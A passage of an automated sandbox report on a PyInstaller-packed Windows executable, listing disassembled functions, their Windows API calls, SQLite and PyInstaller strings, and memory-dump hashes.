                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                • Instruction ID: 9db512d9e5dc9811b878b40bf45de6b8a1355c29298a3473d900e4f9ea779674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1341B462B5A68285EA309B13A5406AA6394FF88FCCF440135DF8DD7B8BDEBCE501D701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                • API String ID: 22509725-3727861699
                                                                                                                                                                                                                                                • Opcode ID: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                                • Instruction ID: 97db739274a5c07f49ff4e3020bd9373a426ac0e4950e8d883ea2a7b2f78e6ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c52ddcc36590edf680ba46134fdbbf73a088618ff38eaf43da130e1a75dd050
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF1ADB260AB8196EB90CF19E0487AD77A0FB84BD4F109036EE8E43755DF39D894C754
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetCurrentProcess.KERNEL32 ref: 00007FF6A29B8780
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: OpenProcessToken.ADVAPI32 ref: 00007FF6A29B8793
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetTokenInformation.ADVAPI32 ref: 00007FF6A29B87B8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetLastError.KERNEL32 ref: 00007FF6A29B87C2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: GetTokenInformation.ADVAPI32 ref: 00007FF6A29B8802
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6A29B881E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B8760: CloseHandle.KERNEL32 ref: 00007FF6A29B8836
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B916C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6A29B3C55), ref: 00007FF6A29B9175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction ID: 61ea2e333c8ae59a66370b6b33421511b738edf6cd7ec0991e42372fcaa7f86f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E218031A5A74286F710AB22E5152EA63A1FF88B88F444035EA4DD7787DFBCD805A750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB347
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB37D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3AA
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3BB
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3CC
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                • Instruction ID: 4ff33f96e10842e483defba3b1a6c28c84005d5533e1d23eb5a295cf7448bdda
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B118E20F8F2428AFA58A723966123D61425F54FBCF444335E86EC6BC7DEACB441A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                                • API String ID: 22509725-1987291987
                                                                                                                                                                                                                                                • Opcode ID: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
                                                                                                                                                                                                                                                • Instruction ID: 5ab70928af0e06a6220f5815db4b5b18066be62e1681e9d72040a757d410f42b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a2680a8d798027709aefecb56822fe1733cc71900058f8ba77e5921da46c44c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDC11322A0AB82A6FA14CF15A44827AA7A1FF51BE0F185235DE6E077D1DF3CE450C724
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                • API String ID: 22509725-3727861699
                                                                                                                                                                                                                                                • Opcode ID: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                                • Instruction ID: d290d9278d6791c5927b77d619aea799a8fc88f106f6dcd084e30db9374548fd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 071cd9badcc09f2493c72e810cc68969e4bc8f5cc32b795679ffd7b93dfb2617
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34A11972A0E2D1A5E7248B1994987BD7BA2FB807C0F055236DBCA83785EF3CD055C764
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                                                                                                • API String ID: 22509725-2063813899
                                                                                                                                                                                                                                                • Opcode ID: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                                • Instruction ID: 1678fa628eb68d615f9041584b556b808ab93368c92b8a29b08139f4084eef87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb70008a6c27e64156325b5e7a2a9a0bb04b816a8d25a30ecc8672c31da071fa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73910462A0AB8596FB54CF11A0582BAB7B1FB48BC4F45A235DE8D07785EF3CE050C324
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                • API String ID: 22509725-3727861699
                                                                                                                                                                                                                                                • Opcode ID: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                                • Instruction ID: 44e2da5485d3f8ac52e9d1b1d82f38ac80e4c028be5824106864cd54443bf7e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 653c5f8135bb0035a4799ee7a04111f8635ea6dcc2a3a0e74a5c84d48665af41
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6481F072B0A682ABE7648F25E0487AE73A1FB847C4F009036EB8D43791DF38E445C754
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction ID: 4c7b0c115121c1cbbd8fae8cf1599d275707e7a567bc843d9d4be60a5255390a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8731F422B5A68156F7209B62A8502F76295BF88FDCF400132EE8DC375BEFBCD5469300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                • Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                • Instruction ID: 7cd31d4b8acf0b514270a77b9ccc8e0a4560aed8dc0cec3c390876a684a75fec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00318432A4A68189EB24DF22E8552F963A0FF88B88F440135EA4D87B5BDF7CD100D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6A29B918F,?,00007FF6A29B3C55), ref: 00007FF6A29B2BA0
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6A29B2C2A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction ID: f3ac2ac17ec3c8bf984ab61d76ec7833834c9d58a30cd64f3de3ed90b4df0346
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2221A362B09B4186E7109B26F4547EA73A4FB88BC8F400136EE8D9765BDF7CD605D740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6A29B1B99), ref: 00007FF6A29B2760
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction ID: 52964d977038a293663dd9cfafa3e2ed55c28e7c3bf06825afa48c4db16e9e47
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21A172A5AB8182E620DB52F8817E66394FF88BC8F400136EE8C9375ADFBCD5459700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction ID: d520a6f038c21e0ef555ee41f3a61349b9345e854baaa79cd777a563fd590117
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0C231B4AB0681FB148B22E4643395360BF49F69F440239C66E861E5CFACE044F300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
